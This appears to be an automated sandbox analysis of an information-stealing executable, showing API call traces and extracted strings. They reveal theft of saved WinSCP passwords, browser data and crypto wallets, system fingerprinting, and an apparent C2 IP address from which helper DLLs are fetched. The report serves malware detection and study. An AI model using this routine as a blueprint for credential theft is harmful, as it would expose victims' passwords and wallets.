                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 004045C7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileH_prolog3_ReadSend
                                                                                                                                            • String ID: GET
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _sprintf.LIBCMT ref: 0040F804
                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000000), ref: 0040F817
                                                                                                                                            • _sprintf.LIBCMT ref: 0040F868
                                                                                                                                              • Part of subcall function 004658EA: __output_l.LIBCMT ref: 00465945
                                                                                                                                              • Part of subcall function 0040EFD7: __EH_prolog3.LIBCMT ref: 0040EFF6
                                                                                                                                              • Part of subcall function 0040EFD7: GetCurrentDirectoryA.KERNEL32(00000104,?,00000020), ref: 0040F025
                                                                                                                                              • Part of subcall function 0040EFD7: lstrcatA.KERNEL32(?,\temp), ref: 0040F034
                                                                                                                                              • Part of subcall function 0040EFD7: CopyFileA.KERNEL32 ref: 0040F041
                                                                                                                                              • Part of subcall function 0040B9E3: GetCurrentDirectoryA.KERNEL32(00000104,?,00481870,?,?), ref: 0040BA23
                                                                                                                                              • Part of subcall function 0040B9E3: lstrcatA.KERNEL32(?,\temp), ref: 0040BA35
                                                                                                                                              • Part of subcall function 0040B9E3: CopyFileA.KERNEL32 ref: 0040BA45
                                                                                                                                              • Part of subcall function 0040B9E3: _memset.LIBCMT ref: 0040BA53
                                                                                                                                              • Part of subcall function 0040B9E3: _sprintf.LIBCMT ref: 0040BA65
                                                                                                                                              • Part of subcall function 0040B9E3: DeleteFileA.KERNEL32(?), ref: 0040BB0F
                                                                                                                                            • FindNextFileA.KERNELBASE(?,?,00000104,00000000,?,?,00000000), ref: 0040F967
                                                                                                                                            • FindClose.KERNEL32(?,?,?,00000000), ref: 0040F978
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Find_sprintf$CopyCurrentDirectorylstrcat$CloseDeleteFirstH_prolog3Next__output_l_memset
                                                                                                                                            • String ID: %s\%s$%s\*$History
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0045C738
                                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,00000018), ref: 0045C76C
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0045C777
                                                                                                                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 0045C784
                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0045C7AB
                                                                                                                                            • _memset.LIBCMT ref: 0045C82D
                                                                                                                                              • Part of subcall function 004046E9: __EH_prolog3.LIBCMT ref: 004046F0
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            • LocalFree.KERNEL32(?), ref: 0045C84C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3KeyboardLayoutListLocal_memmove$AllocFreeInfoLocale_memset
                                                                                                                                            • String ID: /
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: UT
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _malloc.LIBCMT ref: 0040C29B
                                                                                                                                              • Part of subcall function 0046632E: __FF_MSGBANNER.LIBCMT ref: 00466347
                                                                                                                                              • Part of subcall function 0046632E: __NMSG_WRITE.LIBCMT ref: 0046634E
                                                                                                                                              • Part of subcall function 0046632E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,004644D0,00000001,00000000,?,?,?,0046452E,004026BA), ref: 00466373
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0040C2AE
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 0040C2BB
                                                                                                                                            • Process32First.KERNEL32 ref: 0040C2CC
                                                                                                                                            • Process32Next.KERNEL32 ref: 0040C32D
                                                                                                                                            • FindCloseChangeNotification.KERNEL32(?,?,?,00000002,00000000), ref: 0040C339
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseProcess32$AllocateChangeCreateFindFirstHandleHeapNextNotificationSnapshotToolhelp32_malloc
                                                                                                                                            • String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0045C66C
                                                                                                                                            • GetSystemTime.KERNEL32(?,000000F4,00408184,?,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0045C68D
                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000001,00000000), ref: 0045C69A
                                                                                                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0045C6BD
                                                                                                                                              • Part of subcall function 0045F084: __EH_prolog3.LIBCMT ref: 0045F08E
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time$System$H_prolog3H_prolog3_InformationLocalSpecificZone_memmove
                                                                                                                                            • String ID: UTC
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00408BAE
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00408BB5
                                                                                                                                            • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00408BCE
                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF), ref: 00408BE7
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00408BF0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3466090806-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove_memset
                                                                                                                                            • String ID: :memory:$B
                                                                                                                                            • API String ID: 3555123492-416490422
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040B72B
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0040B743
                                                                                                                                            • _memmove.LIBCMT ref: 0040B758
                                                                                                                                            • LocalFree.KERNEL32(?), ref: 0040B764
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Local$AllocCryptDataFreeUnprotect_memmove
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3008826695-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: DISTINCT$GROUP BY$ORDER BY$RIGHT PART OF ORDER BY
                                                                                                                                            • API String ID: 0-1884118544
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0045F3C0
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0045F035
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0045F064
                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000298,0041126F,?), ref: 0045F3F9
                                                                                                                                            • FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 0045F48A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharFileFindMultiWide$FirstH_prolog3_Next
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1519118924-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetUserNameA.ADVAPI32(?,?), ref: 0045C1A9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: NameUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetSystemInfo.KERNEL32(00497104,00000001,0043B9C4,?,00000000,00000104), ref: 0042F165
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 31276548-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004074FD
                                                                                                                                            • CreateDirectoryA.KERNEL32(024C1058,00000000,00000001,00000000,00000000), ref: 004075D9
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(024C1058), ref: 004075EC
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040760E
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                              • Part of subcall function 00404320: __EH_prolog3.LIBCMT ref: 00404327
                                                                                                                                              • Part of subcall function 00404320: _strtok.LIBCMT ref: 00404348
                                                                                                                                              • Part of subcall function 00404320: _strtok.LIBCMT ref: 00404425
                                                                                                                                              • Part of subcall function 004046E9: __EH_prolog3.LIBCMT ref: 004046F0
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00407A5E
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00407A88
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,00000000,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00407AB2
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00407AEC
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00407B16
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00407B47
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000), ref: 00407B70
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,?,?,?,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000), ref: 00407BFC
                                                                                                                                            • __time64.LIBCMT ref: 00407C29
                                                                                                                                            • __localtime64_s.LIBCMT ref: 00407C3C
                                                                                                                                            • _asctime_s.LIBCMT ref: 00407C4E
                                                                                                                                            • _fprintf.LIBCMT ref: 00407C85
                                                                                                                                            • _fprintf.LIBCMT ref: 00407CA7
                                                                                                                                            • _fprintf.LIBCMT ref: 00407CD5
                                                                                                                                            • _fprintf.LIBCMT ref: 00407D0E
                                                                                                                                            • _fprintf.LIBCMT ref: 00407D47
                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000001,00000000), ref: 00407D5A
                                                                                                                                            • _fprintf.LIBCMT ref: 00407D84
                                                                                                                                            • _fprintf.LIBCMT ref: 00407DB8
                                                                                                                                            • _fprintf.LIBCMT ref: 00407E4A
                                                                                                                                            • _fprintf.LIBCMT ref: 00407F63
                                                                                                                                            • _fprintf.LIBCMT ref: 00407FDB
                                                                                                                                            • _fprintf.LIBCMT ref: 00408053
                                                                                                                                            • _fprintf.LIBCMT ref: 004080CB
                                                                                                                                            • _fprintf.LIBCMT ref: 00408143
                                                                                                                                            • _fprintf.LIBCMT ref: 004081BF
                                                                                                                                            • _fprintf.LIBCMT ref: 0040821D
                                                                                                                                            • _fprintf.LIBCMT ref: 00408277
                                                                                                                                            • _fprintf.LIBCMT ref: 004082EF
                                                                                                                                            • _fprintf.LIBCMT ref: 00408368
                                                                                                                                            • _fprintf.LIBCMT ref: 004083DF
                                                                                                                                            • _fprintf.LIBCMT ref: 00408438
                                                                                                                                            • _fprintf.LIBCMT ref: 00408474
                                                                                                                                              • Part of subcall function 00403B46: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00403B58
                                                                                                                                              • Part of subcall function 00402CCF: _memmove.LIBCMT ref: 00402D20
                                                                                                                                            • _fprintf.LIBCMT ref: 004084BE
                                                                                                                                            • _fprintf.LIBCMT ref: 004084FA
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00408556
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 00408582
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000), ref: 004085C3
                                                                                                                                              • Part of subcall function 00409D6D: __EH_prolog3.LIBCMT ref: 00409D74
                                                                                                                                              • Part of subcall function 004067A7: __EH_prolog3.LIBCMT ref: 004067C6
                                                                                                                                              • Part of subcall function 004067A7: __wgetenv.LIBCMT ref: 004067D4
                                                                                                                                              • Part of subcall function 004067A7: __wgetenv.LIBCMT ref: 0040683D
                                                                                                                                              • Part of subcall function 0045BCA6: __EH_prolog3.LIBCMT ref: 0045BCC5
                                                                                                                                            • _fprintf.LIBCMT ref: 00407EEB
                                                                                                                                              • Part of subcall function 0045C174: GetUserNameA.ADVAPI32(?,?), ref: 0045C1A9
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(024C1058,00000001,00000000,ccount,00000000,00000000,?,00000001,00000000,00000000,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00408893
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0045F035
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0045F064
                                                                                                                                            • Sleep.KERNEL32(00014FF0,342E3837,logs,?,00000001,00000000,00000001,00000000), ref: 00408A72
                                                                                                                                            • DeleteFileA.KERNEL32(?,342E3837,logs,?,00000001,00000000,00000001,00000000), ref: 00408AB6
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(C:\ProgramData), ref: 00408AC1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fprintf$Directory$Create$Current$H_prolog3$ByteCharMultiWide__wgetenv_memmove_strtok$DeleteFileH_prolog3_Ios_base_dtorNameProcessSleepUser__localtime64_s__time64_asctime_sstd::ios_base::_
                                                                                                                                            • String ID: [Software]$*.*$.zip$/freebl3.dll$/mozglue.dll$/msvcp140.dll$/nss3.dll$/softokn3.dll$/vcruntime140.dll$78.47.81.226$C:\ProgramData$CPU Count: $Computer Name: $Date: %s$Display Language: $Display Resolution: $F$GUID: %s$HWID: %s$Keyboard Languages: $Local Time: $MachineID: %s$Path: %s $Processor: $RAM: $TimeZone: $User Name: $Version: %s$VideoCard: $Windows: $Work Dir: %s $[Hardware]$[Processes]$\files$\files\$\files\Wallets$\freebl3.dll$\mozglue.dll$\msvcp140.dll$\nss3.dll$\softokn3.dll$\vcruntime140.dll$ccount$files\information.txt$logs
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040FC46
                                                                                                                                              • Part of subcall function 0040E5E7: __EH_prolog3_GS.LIBCMT ref: 0040E5EE
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000104,00000001,?,00000104,0000002C), ref: 0040FCB2
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040FCB5
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0040FCCB
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FCCE
                                                                                                                                            • _strcpy_s.LIBCMT ref: 0040FD10
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0040FD27
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FD2A
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000010,00000010,?,00000104), ref: 0040FD54
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FD57
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000104), ref: 0040FD5E
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040FD61
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0040FD77
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FD7A
                                                                                                                                            • _strcpy_s.LIBCMT ref: 0040FDA3
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0040FDB4
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FDB7
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000010,00000010,?,00000104), ref: 0040FDD6
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FDD9
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000104), ref: 0040FDE0
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040FDE3
                                                                                                                                            • _strcpy_s.LIBCMT ref: 0040FDFB
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0040FE0C
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FE0F
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000010,00000010,?,00000104), ref: 0040FE35
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FE38
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000104), ref: 0040FE3F
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040FE42
                                                                                                                                            • _strcpy_s.LIBCMT ref: 0040FE5A
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0040FE6B
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040FE6E
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 0040FE89
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040FE8C
                                                                                                                                            • _strcpy_s.LIBCMT ref: 0040FEEC
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000010,00000001,00000000,00000001,00000000,?,?,00000010), ref: 0040FF12
                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,00000010), ref: 0040FF15
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,00000010), ref: 0040FF2D
                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000010), ref: 0040FF30
                                                                                                                                            • _strcpy_s.LIBCMT ref: 0040FF48
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000010), ref: 0040FF54
                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000010), ref: 0040FF57
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000010,00000010,?,00000104,?,?,?,?,?,00000010), ref: 0040FF7E
                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000010), ref: 0040FF81
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000104,?,?,?,?,?,00000010), ref: 0040FF88
                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000010), ref: 0040FF8B
                                                                                                                                            • _strcpy_s.LIBCMT ref: 0040FFA3
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000010), ref: 0040FFB4
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000010,?,?,?,?,?,00000010), ref: 00410051
                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000010), ref: 00410054
                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000010), ref: 0040FFB7
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$Process$Free$Alloc_strcpy_s$_memmove$H_prolog3H_prolog3_
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004100C6
                                                                                                                                            • _memset.LIBCMT ref: 004100E6
                                                                                                                                            • _memset.LIBCMT ref: 00410106
                                                                                                                                            • _memset.LIBCMT ref: 0041011A
                                                                                                                                            • _memset.LIBCMT ref: 00410128
                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0041014E
                                                                                                                                            • RegGetValueW.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 00410174
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 00410186
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 0041019C
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 004101AD
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 004101C3
                                                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 004101E4
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 004101FA
                                                                                                                                            • _fprintf.LIBCMT ref: 00410253
                                                                                                                                            • _fprintf.LIBCMT ref: 0041025E
                                                                                                                                            • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,?,00000001,00000000,passwords.txt), ref: 00410283
                                                                                                                                            • _fprintf.LIBCMT ref: 00410292
                                                                                                                                            • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?,?,?,?,00000001,00000000,passwords.txt), ref: 004102BE
                                                                                                                                            • _fprintf.LIBCMT ref: 004102E6
                                                                                                                                            • _fprintf.LIBCMT ref: 00410301
                                                                                                                                            • _fprintf.LIBCMT ref: 0041030E
                                                                                                                                            • RegGetValueA.ADVAPI32(?,?,UserName,00000002,00000000,?,?,?,?,?,?,00000001,00000000,passwords.txt), ref: 00410332
                                                                                                                                            • _fprintf.LIBCMT ref: 00410341
                                                                                                                                            • RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,00000001,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00410373
                                                                                                                                              • Part of subcall function 0040FC2D: __EH_prolog3.LIBCMT ref: 0040FC46
                                                                                                                                              • Part of subcall function 0040FC2D: GetProcessHeap.KERNEL32(00000008,00000104,00000001,?,00000104,0000002C), ref: 0040FCB2
                                                                                                                                              • Part of subcall function 0040FC2D: HeapAlloc.KERNEL32(00000000), ref: 0040FCB5
                                                                                                                                              • Part of subcall function 0040FC2D: GetProcessHeap.KERNEL32(00000000,?), ref: 0040FCCB
                                                                                                                                              • Part of subcall function 0040FC2D: HeapFree.KERNEL32(00000000), ref: 0040FCCE
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            • _fprintf.LIBCMT ref: 004103C5
                                                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,00000001), ref: 004103EC
                                                                                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,00000001,00000000,passwords.txt), ref: 00410419
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fprintf$CloseValue$Heap_memset$EnumH_prolog3OpenProcess_memmove$AllocFree
                                                                                                                                            • String ID: Login: $Password: %s$:%s$:22$Host: $HostName$Password$PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040EFF6
                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000020), ref: 0040F025
                                                                                                                                            • lstrcatA.KERNEL32(?,\temp), ref: 0040F034
                                                                                                                                            • CopyFileA.KERNEL32 ref: 0040F041
                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040F2AF
                                                                                                                                              • Part of subcall function 0046647E: __fsopen.LIBCMT ref: 0046648B
                                                                                                                                              • Part of subcall function 0040EE8C: __EH_prolog3_GS.LIBCMT ref: 0040EE93
                                                                                                                                              • Part of subcall function 0040EE8C: _memset.LIBCMT ref: 0040EEEE
                                                                                                                                              • Part of subcall function 0040EE8C: LocalAlloc.KERNEL32(00000040,?,00000000,?,?), ref: 0040EF29
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F137
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F145
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F14C
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F15A
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F161
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F16F
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F176
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F1B9
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F1CB
                                                                                                                                            • _fprintf.LIBCMT ref: 0040F1D9
                                                                                                                                              • Part of subcall function 004651EC: __lock_file.LIBCMT ref: 00465233
